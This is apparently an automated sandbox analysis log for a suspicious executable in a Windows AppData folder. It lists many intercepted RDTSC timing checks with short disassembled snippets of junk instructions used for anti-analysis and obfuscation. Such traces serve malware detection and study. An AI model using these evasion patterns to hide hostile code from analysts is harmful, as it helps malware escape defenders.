Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544F26 second address: 544F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 jc 00007F95FD07A056h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544F35 second address: 544F4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544F4F second address: 544F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544F55 second address: 544F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544009 second address: 54400D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 535045 second address: 535061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 jmp 00007F95FD7D89A1h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5441FE second address: 544219 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F95FD07A061h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 546ED2 second address: 546EFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F95FD7D89A7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F95FD7D8998h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 546EFD second address: 546F02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 546F7E second address: 546F84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5471F2 second address: 547205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 547205 second address: 54721E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnl 00007F95FD7D8996h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F95FD7D8996h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 54721E second address: 547228 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 547228 second address: 54722D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 54722D second address: 547254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F95FD07A056h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007F95FD07A060h 0x00000018 pop ecx 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 547254 second address: 54727E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F95FD7D89A4h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 54727E second address: 5472DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F95FD07A058h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 jng 00007F95FD07A05Ah 0x00000027 mov cx, 7E24h 0x0000002b lea ebx, dword ptr [ebp+1244BDE2h] 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F95FD07A058h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5472DD second address: 5472E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5472E1 second address: 5472E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5472E5 second address: 5472EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 547492 second address: 547496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 559525 second address: 55952F instructions: 0x00000000 rdtsc 0x00000002 je 00007F95FD7D8996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55952F second address: 559535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 566B02 second address: 566B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 566B06 second address: 566B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53F105 second address: 53F123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F95FD7D899Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53F123 second address: 53F12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565126 second address: 56512A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565241 second address: 565245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565245 second address: 56525D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56525D second address: 565263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565263 second address: 565269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565269 second address: 56526D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565A9E second address: 565AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F95FD7D8996h 0x0000000f je 00007F95FD7D8996h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565AB3 second address: 565AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E2ED second address: 55E2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E2F1 second address: 55E310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95FD07A056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F95FD07A05Ch 0x00000012 jbe 00007F95FD07A056h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E310 second address: 55E314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E314 second address: 55E31E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E31E second address: 55E323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5319F5 second address: 5319FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5319FB second address: 531A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F95FD7D89A0h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 531A17 second address: 531A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565C40 second address: 565C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F95FD7D8996h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56631F second address: 566323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5668EC second address: 56690B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F95FD7D89A8h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56A2F2 second address: 56A2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56A2F8 second address: 56A334 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95FD7D899Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F95FD7D89A1h 0x00000010 jg 00007F95FD7D89A2h 0x00000016 je 00007F95FD7D899Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53A0D3 second address: 53A132 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F95FD07A056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F95FD07A069h 0x00000011 jmp 00007F95FD07A05Dh 0x00000016 push edi 0x00000017 jmp 00007F95FD07A05Eh 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F95FD07A066h 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56DCF6 second address: 56DD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F95FD7D8996h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E315 second address: 56E31A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E31A second address: 56E32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E32A second address: 56E355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c jnl 00007F95FD07A056h 0x00000012 jnp 00007F95FD07A056h 0x00000018 popad 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c ja 00007F95FD07A056h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E355 second address: 56E35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E35A second address: 56E387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F95FD07A063h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 573121 second address: 57314F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95FD7D89A0h 0x0000000b jmp 00007F95FD7D89A0h 0x00000010 jo 00007F95FD7D899Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57341C second address: 573448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A05Ah 0x00000009 jno 00007F95FD07A06Ah 0x0000000f push ebx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 573448 second address: 57344E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57358E second address: 573594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5739A0 second address: 5739A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5739A9 second address: 5739AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5739AD second address: 5739B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5739B3 second address: 5739BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D06 second address: 574D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D0A second address: 574D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D10 second address: 574D59 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95FD7D8998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c jmp 00007F95FD7D89A9h 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jl 00007F95FD7D89BEh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F95FD7D89A5h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D59 second address: 574D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D71 second address: 574D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D75 second address: 574D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F95FD07A05Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D8A second address: 574D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574EC5 second address: 574EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5754BC second address: 5754C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5758BD second address: 5758CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5758CA second address: 5758E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F95FD7D899Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57593F second address: 57594C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007F95FD07A05Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 575DDB second address: 575DED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F95FD7D8998h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 575E5D second address: 575E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5764D1 second address: 5764E6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F95FD7D899Ch 0x00000008 jo 00007F95FD7D8996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 576E76 second address: 576E84 instructions: 0x00000000 rdtsc 0x00000002 je 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579469 second address: 57946D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 577692 second address: 577697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57946D second address: 57949F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F95FD7D8998h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D37C5h] 0x0000001a push 00000000h 0x0000001c mov esi, edx 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F95FD7D899Dh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57949F second address: 5794A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F95FD07A056h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579EA0 second address: 579EA6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579EA6 second address: 579EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F95FD07A056h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579EB0 second address: 579F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, dword ptr [ebp+122D1B14h] 0x00000011 push 00000000h 0x00000013 jbe 00007F95FD7D899Ch 0x00000019 mov dword ptr [ebp+122D1A4Fh], edx 0x0000001f mov di, E6B4h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F95FD7D8998h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000014h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F95FD7D89A1h 0x00000049 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579F07 second address: 579F0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
